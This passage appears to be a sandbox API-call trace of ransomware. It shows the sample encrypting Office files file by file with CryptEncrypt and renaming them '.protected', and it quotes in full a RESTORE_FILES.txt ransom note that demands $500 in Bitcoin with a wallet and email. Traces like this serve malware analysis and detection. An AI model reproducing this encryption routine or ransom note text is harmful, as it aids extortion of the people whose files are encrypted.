(lpString1="WWINTL.REST.trx_dll", lpString2="Program Files") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.646] lstrcmpiW (lpString1="WWINTL.REST.trx_dll", lpString2="System Volume Information") returned 1 [0070.646] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.646] StrStrIW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.646] lstrcmpW (lpString1="WWINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.646] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.646] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.646] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.655] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.655] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.655] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.655] StrStrW (lpFirst="WWINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.655] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll") returned 71 [0070.655] StrStrW 
(lpFirst="WWINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.655] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.677] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.678] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.693] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.693] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.764] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.764] CloseHandle (hObject=0xd8) returned 1 [0070.765] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.protected") returned 81 [0070.765] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll.protected")) returned 1 [0070.766] 
FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Windows") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.766] lstrcmpiW (lpString1="XLINTL32.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.766] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrIW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.766] lstrcmpW (lpString1="XLINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.766] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.766] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.766] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrW 
(lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.766] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll") returned 72 [0070.766] StrStrW (lpFirst="XLINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.767] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.870] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.870] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.871] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.871] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.901] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.901] CloseHandle (hObject=0xd8) returned 1 [0070.902] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.protected") returned 82 [0070.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), 
lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll.protected")) returned 1 [0070.903] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Windows") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.903] lstrcmpiW (lpString1="XLINTL32.REST.trx_dll", lpString2="System Volume Information") returned 1 [0070.903] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrIW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".protected") returned 0x0 [0070.903] lstrcmpW (lpString1="XLINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.903] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.903] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.903] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.903] lstrlenW 
(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0070.903] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0070.903] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll") returned 73 [0070.903] StrStrW (lpFirst="XLINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0070.904] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.906] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.906] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.906] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.906] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.924] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.924] CloseHandle (hObject=0xd8) returned 1 [0070.925] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.protected") returned 83 [0070.925] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll.protected")) returned 1 [0070.926] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Windows") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0070.926] lstrcmpiW (lpString1="XLSLICER.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0070.926] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrIW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0070.926] lstrcmpW (lpString1="XLSLICER.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0070.926] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0070.926] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0070.926] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: 
"c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0070.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0070.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0070.926] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll") returned 72 [0070.926] StrStrW (lpFirst="XLSLICER.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0070.926] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.938] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0070.938] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0070.939] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0070.939] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0070.939] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, 
lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0070.939] CloseHandle (hObject=0xd8) returned 1 [0070.940] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.protected") returned 82 [0070.940] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll.protected")) returned 1 [0070.941] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0070.941] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0070.941] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt") returned 69 [0070.941] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0070.941] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.941] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0070.942] lstrlenA (lpString="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") returned 684 [0070.942] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0070.942] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.942] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0070.942] CloseHandle (hObject=0xd4) returned 1 [0070.943] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0070.943] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0070.943] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt") returned 64 [0070.943] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0070.943] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.943] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0070.944] lstrlenA (lpString="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") returned 684 [0070.944] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0070.944] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0070.944] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0070.944] CloseHandle (hObject=0xb4) returned 1 [0070.944] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0070.944] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0070.945] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\RESTORE_FILES.txt") returned 53 [0070.945] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\office\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0070.945] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0070.945] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0070.946] lstrlenA (lpString="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") returned 684 [0070.946] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 